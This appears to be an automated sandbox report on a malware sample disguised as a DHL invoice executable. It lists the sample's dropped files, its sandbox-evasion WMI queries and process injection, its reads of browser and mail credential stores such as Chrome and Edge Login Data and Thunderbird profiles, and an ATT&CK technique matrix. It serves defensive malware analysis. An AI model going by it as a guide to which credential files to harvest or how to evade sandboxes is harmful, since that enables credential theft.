          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: vaultcli.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeFile written: C:\Users\user\AppData\Local\Temp\tmc.iniJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
          Source: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Data Obfuscation

          barindex
          Source: Yara matchFile source: Process Memory Space: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe PID: 6120, type: MEMORYSTR
          Source: Yara matchFile source: 00000000.00000002.1438112773.00000000083AE000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.6321510839.000000000542E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 0_2_6F7A1B28 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,lstrcpyA,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleA,LdrInitializeThunk,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6F7A1B28
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 9_2_00118A4D push 8BFFFFF7h; ret 9_2_00118A53
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 9_2_00110C45 push ebx; retf 9_2_00110C52
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 9_2_00110C6D push edi; retf 9_2_00110C7A
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 9_2_00110CCB push edi; retf 9_2_00110C7A
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 9_2_00118ECF push 8BFFFFF8h; ret 9_2_00118ED5
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 9_2_38DE2037 push A836B62Dh; retf 9_2_38DE2045
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeFile created: \dhl awb - invoice & shipping documents.bat.exe
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeFile created: \dhl awb - invoice & shipping documents.bat.exeJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\BgImage.dllJump to dropped file
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\nsExec.dllJump to dropped file
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\UserInfo.dllJump to dropped file
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semesJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\maskinmestres.ChiJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Allopurinol.fluJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Misbound.BogJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Charting.skrJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\kapselaabnernesJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\kapselaabnernes\chokoladeforretning.marJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\kapselaabnernes\doubling.regJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\kapselaabnernes\hmoriderne.nerJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\kapselaabnernes\lvens.flbJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\kapselaabnernes\materialiter.sigJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\kapselaabnernes\preinvest.priJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\kapselaabnernes\ridningen.txtJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeAPI/Special instruction interceptor: Address: 8AB9D05
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeAPI/Special instruction interceptor: Address: 5B39D05
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeMemory allocated: 36B80000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeMemory allocated: 38B80000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\BgImage.dllJump to dropped file
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\nsExec.dllJump to dropped file
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\UserInfo.dllJump to dropped file
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 0_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,0_2_00405A4F
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 0_2_00406620 FindFirstFileA,FindClose,0_2_00406620
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 0_2_004027CF FindFirstFileA,0_2_004027CF
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 9_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,9_2_00405A4F
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 9_2_00406620 FindFirstFileA,FindClose,9_2_00406620
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 9_2_004027CF FindFirstFileA,9_2_004027CF
          Source: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, 00000009.00000002.6335321525.0000000006408000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-4926
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-5074
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 0_2_00406647 LdrInitializeThunk,GetSystemDirectoryA,LdrInitializeThunk,LdrInitializeThunk,wsprintfA,LdrInitializeThunk,LoadLibraryExA,0_2_00406647
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 0_2_6F7A1B28 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,lstrcpyA,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleA,LdrInitializeThunk,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6F7A1B28
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeMemory allocated: page read and write | page guardJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess created: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe "C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe"Jump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeQueries volume information: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 0_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,LdrInitializeThunk,GetVersionExA,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_004033D8
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
          Source: Yara matchFile source: 00000009.00000002.6345828511.0000000036BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
          Windows Management Instrumentation
          1
          Registry Run Keys / Startup Folder
          1
          Access Token Manipulation
          1
          Masquerading
          1
          OS Credential Dumping
          211
          Security Software Discovery
          Remote Services1
          Email Collection
          11
          Encrypted Channel
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Native API
          1
          DLL Side-Loading
          11
          Process Injection
          12
          Virtualization/Sandbox Evasion
          LSASS Memory12
          Virtualization/Sandbox Evasion
          Remote Desktop Protocol1
          Archive Collected Data
          1
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          Registry Run Keys / Startup Folder
          1
          Disable or Modify Tools
          Security Account Manager1
          System Network Configuration Discovery
          SMB/Windows Admin Shares1
          Data from Local System
          2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          DLL Side-Loading
          1
          Access Token Manipulation
          NTDS3
